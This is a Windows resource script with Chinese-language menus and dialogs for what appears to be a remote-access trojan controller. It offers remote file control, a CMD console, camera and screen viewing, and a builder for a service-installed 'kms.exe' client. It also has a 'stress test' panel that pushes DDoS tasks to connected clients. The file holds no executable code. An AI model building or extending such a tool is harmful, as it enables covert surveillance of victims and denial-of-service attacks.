// Generated by ResEdit 1.4.13
// Copyright (C) 2006-2010
// http://www.resedit.net

#include <windows.h>
#include <commctrl.h>
#include <richedit.h>
#include "resource.h"




//
// Toolbar resources
//
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDR_TOOLBAR1 TOOLBAR 16, 15
{
    BUTTON      IDR_COMMAND1
    BUTTON      IDR_COMMAND2
    BUTTON      IDR_COMMAND3
    BUTTON      IDR_COMMAND4
    BUTTON      IDR_COMMAND5
    BUTTON      IDR_COMMAND6
    BUTTON      IDR_COMMAND7
    BUTTON      IDR_COMMAND8
    BUTTON      IDR_COMMAND9
    BUTTON      IDR_COMMAND10
    BUTTON      IDR_COMMAND11
}



LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDR_TOOLBAR2 TOOLBAR 16, 15
{
    BUTTON      IDR_COMMAND12
    BUTTON      IDR_COMMAND13
    BUTTON      IDR_COMMAND14
    BUTTON      IDR_COMMAND15
    BUTTON      IDR_COMMAND16
    BUTTON      IDR_COMMAND17
}



//
// Bitmap resources
//
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDR_TOOLBAR1       BITMAP         "bitmap1.bmp"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDR_TOOLBAR2       BITMAP         "bitmap2.bmp"



//
// Menu resources
//
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDR_MENU1 MENU
{
    POPUP "配置选项(&F)"
    {
        MENUITEM "中心端设置", IDR_COMMAND1
        MENUITEM "客户端生成", IDM_MENU_MAKE_FILE
        MENUITEM SEPARATOR
        MENUITEM "退出", IDM_EXIT1
    }
    POPUP "查看(&V)"
    {
        MENUITEM "客户端", IDR_COMMAND2
        MENUITEM "压力测试", IDR_COMMAND3
        MENUITEM "日志", IDR_COMMAND4
        MENUITEM "关于", IDR_COMMAND5
    }
}



LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDR_MENU2 MENU
{
    POPUP "rightfile"
    {
        POPUP "查看方式"
        {
            MENUITEM "大图标", IDM_VIEW_MAX_ICON
            MENUITEM "小图标", IDM_VIEW_MIN_ICON
            MENUITEM "列表", IDM_VIEW_LIST
            MENUITEM "详细信息", IDM_VIEW_X_LIST
        }
        MENUITEM SEPARATOR
        MENUITEM "上传文件", IDM_UP_FILE
        MENUITEM "下载文件", IDM_DOWN_FILE
        MENUITEM SEPARATOR
        MENUITEM "上传目录", IDM_UP_DIRECTORY
        MENUITEM "下载目录", IDM_DOWN_DIRECTORY
        MENUITEM SEPARATOR
        MENUITEM "删除文件", IDM_DELETE_FILE
        MENUITEM "删除目录", IDM_DELETE_DIRECTORY
        MENUITEM "远程运行程序", IDM_EXECFILE
    }
}



LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDR_MENU3 MENU
{
    POPUP "rightfile"
    {
        MENUITEM "文件管理", IDM_FRAME_FILE
        MENUITEM "控制台(CMD命令)", IDM_FRAME_CMD
        MENUITEM "摄像头", IDM_FRAME_CAMERA
        MENUITEM "屏幕查看", IDM_FRAME_SCREEN
        MENUITEM SEPARATOR
        MENUITEM "重新启动", IDM_DELETE_FILE
        MENUITEM "关闭计算机", IDM_DELETE_DIRECTORY
        MENUITEM SEPARATOR
        MENUITEM "客户端卸载", IDM_FRAME_DELETE
    }
}



LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDR_MENU4 MENU
{
    POPUP "rightddos"
    {
        MENUITEM "启动任务", IDM_DDOS_START
        MENUITEM "停止任务", IDM_DDOS_STOP
        MENUITEM SEPARATOR
        MENUITEM "添加任务", IDM_DDOS_ADD
        MENUITEM "编辑任务", IDM_DDOS_EDIT
        MENUITEM "删除任务", IDM_DDOS_DEL
    }
}



//
// Dialog resources
//
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDD_DIALOG1 DIALOG 0, 0, 384, 214
STYLE DS_3DLOOK | DS_CENTER | DS_MODALFRAME | DS_SHELLFONT | WS_VISIBLE | WS_BORDER | WS_CAPTION | WS_DLGFRAME | WS_POPUP | WS_SYSMENU
CAPTION "Dialog"
FONT 8, "Ms Shell Dlg 2"
{
    DEFPUSHBUTTON   "OK", IDOK, 272, 193, 50, 14
    PUSHBUTTON      "Cancel", IDCANCEL, 327, 193, 50, 14
}



LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDD_DIALOG_CENTER_CONFIG DIALOG 0, 0, 273, 83
STYLE DS_3DLOOK | DS_CENTER | DS_MODALFRAME | DS_SHELLFONT | WS_VISIBLE | WS_BORDER | WS_CAPTION | WS_DLGFRAME | WS_POPUP | WS_SYSMENU
CAPTION "中心端设置"
FONT 8, "Ms Shell Dlg 2"
{
    PUSHBUTTON      "确定", ID_BT_OK, 163, 59, 48, 14
    PUSHBUTTON      "取消", ID_BT_CANCEL, 214, 59, 48, 14
    LTEXT           "客户端上线端口:", IDC_STATIC, 10, 14, 60, 8, SS_LEFT
    EDITTEXT        IDC_EDIT_LINE_PORT, 72, 12, 190, 12, ES_AUTOHSCROLL | ES_NUMBER
    LTEXT           "控制台上线端口:", IDC_STATIC, 10, 30, 60, 8, SS_LEFT
    EDITTEXT        IDC_EDIT_CMD_PORT, 72, 28, 190, 12, ES_AUTOHSCROLL | ES_NUMBER
    GROUPBOX        "客户端上线设置", IDC_STATIC, 4, 1, 265, 77
    LTEXT           "注意:如果要改客户端上线端口,设置完后,必须重启启动软件,才会生效.", IDC_STATIC, 10, 47, 246, 8, SS_LEFT
}



LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDD_DIALOG_DDOS DIALOG 0, 0, 326, 104
STYLE DS_3DLOOK | DS_CENTER | DS_MODALFRAME | DS_SHELLFONT | WS_VISIBLE | WS_BORDER | WS_CAPTION | WS_DLGFRAME | WS_POPUP | WS_SYSMENU
CAPTION "压力测试任务"
FONT 8, "Ms Shell Dlg 2"
{
    PUSHBUTTON      "保存", ID_BT_OK, 221, 78, 44, 14
    PUSHBUTTON      "取消", ID_BT_CANCEL, 272, 78, 43, 14
    GROUPBOX        "压力测试选项", IDC_STATIC, 3, 2, 319, 96
    EDITTEXT        IDC_EDIT1, 39, 15, 276, 12, ES_AUTOHSCROLL
    LTEXT           "地址:", IDC_STATIC, 10, 16, 20, 8, SS_LEFT
    LTEXT           "并发数:", IDC_STATIC, 9, 32, 28, 8, SS_LEFT
    EDITTEXT        IDC_EDIT_THREAD, 39, 31, 53, 12, ES_AUTOHSCROLL | ES_NUMBER
    LTEXT           "类型:", IDC_STATIC, 10, 49, 20, 8, SS_LEFT
    COMBOBOX        IDC_COMBO1, 39, 48, 122, 56, CBS_DROPDOWNLIST | CBS_HASSTRINGS
    LTEXT           "注意:保存后,右键任务可以选择编辑,删除,或任务开始.新上线的客户端会自动加载任务.", IDC_STATIC, 10, 66, 305, 8, SS_LEFT
}



LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDD_DIALOG_MAKE_FILE DIALOG 0, 0, 293, 102
STYLE DS_3DLOOK | DS_CENTER | DS_MODALFRAME | DS_SHELLFONT | WS_VISIBLE | WS_BORDER | WS_CAPTION | WS_DLGFRAME | WS_POPUP | WS_SYSMENU
CAPTION "客户端生成"
FONT 8, "Ms Shell Dlg 2"
{
    PUSHBUTTON      "生成", ID_BT_MAKE_FILE, 192, 83, 45, 14
    PUSHBUTTON      "取消", ID_BT_CANCEL, 242, 83, 45, 14
    EDITTEXT        IDC_EDIT_ADDR, 63, 4, 223, 12, ES_AUTOHSCROLL
    LTEXT           "IP地址或域名:", IDC_STATIC, 8, 7, 50, 8, SS_LEFT
    LTEXT           "端口:", IDC_STATIC, 38, 22, 20, 8, SS_LEFT
    EDITTEXT        IDC_EDIT_PORT, 63, 20, 62, 12, ES_AUTOHSCROLL
    EDITTEXT        IDC_EDIT_SERVER, 63, 37, 108, 12, ES_AUTOHSCROLL
    LTEXT           "服务名:", IDC_STATIC, 31, 39, 28, 8, SS_LEFT
    EDITTEXT        IDC_EDIT_SERVER_NAME, 63, 53, 157, 12, ES_AUTOHSCROLL
    LTEXT           "服务显示名:", IDC_STATIC, 15, 55, 44, 8, SS_LEFT
    LTEXT           "注意:生成成功后的客户端有14KB大小,就在当前软件的目录下,名为[kms.exe]", IDC_STATIC, 11, 70, 265, 8, SS_LEFT
}



//
// String Table resources
//
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
STRINGTABLE
{
}



//
// Icon resources
//
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_CDROM          ICON           ".\\res\\CDROM.ICO"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_CLIENT_LIST_ICON1 ICON           ".\\res\\FLD313.ICO"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_CLIENT_LIST_ICON2 ICON           ".\\res\\FLD314.ICO"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_CLIENT_LIST_ICON3 ICON           ".\\res\\FLD315.ICO"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_CLIENT_LIST_ICON4 ICON           ".\\res\\FLD316.ICO"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_CLIENT_LIST_ICON5 ICON           ".\\res\\FLD317.ICO"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_CLIENT_LIST_ICON6 ICON           ".\\res\\FLD318.ICO"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_DISK           ICON           ".\\res\\DISK.ICO"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_FILE_DOWN      ICON           ".\\res\\DOWN.ICO"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_FILE_UP        ICON           ".\\res\\UP.ICO"


LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDI_UNKNOWN        ICON           ".\\res\\UNKNOWN.ICO"
